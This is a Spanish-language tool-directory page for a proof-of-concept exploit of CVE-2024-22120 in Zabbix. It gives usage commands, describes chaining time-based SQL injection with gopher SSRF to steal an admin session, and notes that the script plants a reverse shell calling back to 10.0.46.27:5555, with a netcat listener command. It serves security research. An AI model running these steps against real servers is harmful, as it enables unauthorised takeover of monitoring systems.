Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-22120-RCE-with-gopher — Exploit de prueba de concepto para CVE-2024-22120 que aprovecha la inyección SQL basada en tiempo y SSRF basado en gopher para lograr ejecución remota de código en servidores Zabbix vulnerables para fines de investigación educativa en seguridad. | Kitploit
Herramientas/GitHubGitHub/darkbytehunter/cve-2024-22120-rce-with-gopher
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubdarkbytehunter/cve-2024-22120-rce-with-gopher

CVE-2024-22120-RCE-with-gopher

Exploit de prueba de concepto para CVE-2024-22120 que aprovecha la inyección SQL basada en tiempo y SSRF basado en gopher para lograr ejecución remota de código en servidores Zabbix vulnerables para fines de investigación educativa en seguridad.

Ver Repositorio
12hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Uso

root@kitploit:~
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>

Escenario de ejemplo

Has identificado un servidor Zabbix ejecutándose en la IP 192.168.1.100, y tienes acceso a un usuario con pocos privilegios con los siguientes detalles:

  • ID de sesión (sid): d82bf6715e1d3c1f25
  • ID de host (hostid): 10107
  • ID de sesión PHP (phpsessid): a4g7f48d9j3r7h8s9g

Quieres explotar la vulnerabilidad RCE usando este script.

Ejecutando el Script

root@kitploit:~
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3

Explicación de Parámetros:

  • --ip 192.168.1.100: La dirección IP del servidor Zabbix.
  • --sid d82bf6715e1d3c1f25: El ID de sesión de un usuario con pocos privilegios.
  • --hostid 10107: El ID de un host al que el usuario con pocos privilegios puede acceder.
  • --phpsessid a4g7f48d9j3r7h8s9g: El ID de sesión PHP utilizado para autenticar solicitudes.
  • --false_time 1: Tiempo en segundos para esperar en caso de una suposición incorrecta durante la inyección SQL (por defecto es 1 segundo).
  • --true_time 3: Tiempo en segundos para esperar en caso de una suposición correcta durante la inyección SQL (por defecto es 3 segundos).

Qué Sucede Después:

  1. El script comenzará intentando extraer el ID de sesión del administrador utilizando una inyección SQL basada en tiempo.
  2. Una vez obtenido el ID de sesión del administrador, el script creará un script de shell inversa en el servidor Zabbix.
  3. Finalmente, el script ejecutará la shell inversa, conectándose de vuelta a tu máquina en la IP y puerto especificados (10.0.46.27:5555 en el script).

Notas:

  • Asegúrate de que tu máquina esté escuchando en el puerto especificado (5555 en el script) para capturar la shell inversa. Puedes usar netcat para esto:

    root@kitploit:~
    nc -lvnp 5555
    
  • Reemplaza la IP 10.0.46.27 y el puerto 5555 en la función CreateScript con tu propia IP y el puerto deseado para recibir la shell inversa.

Descargar herramienta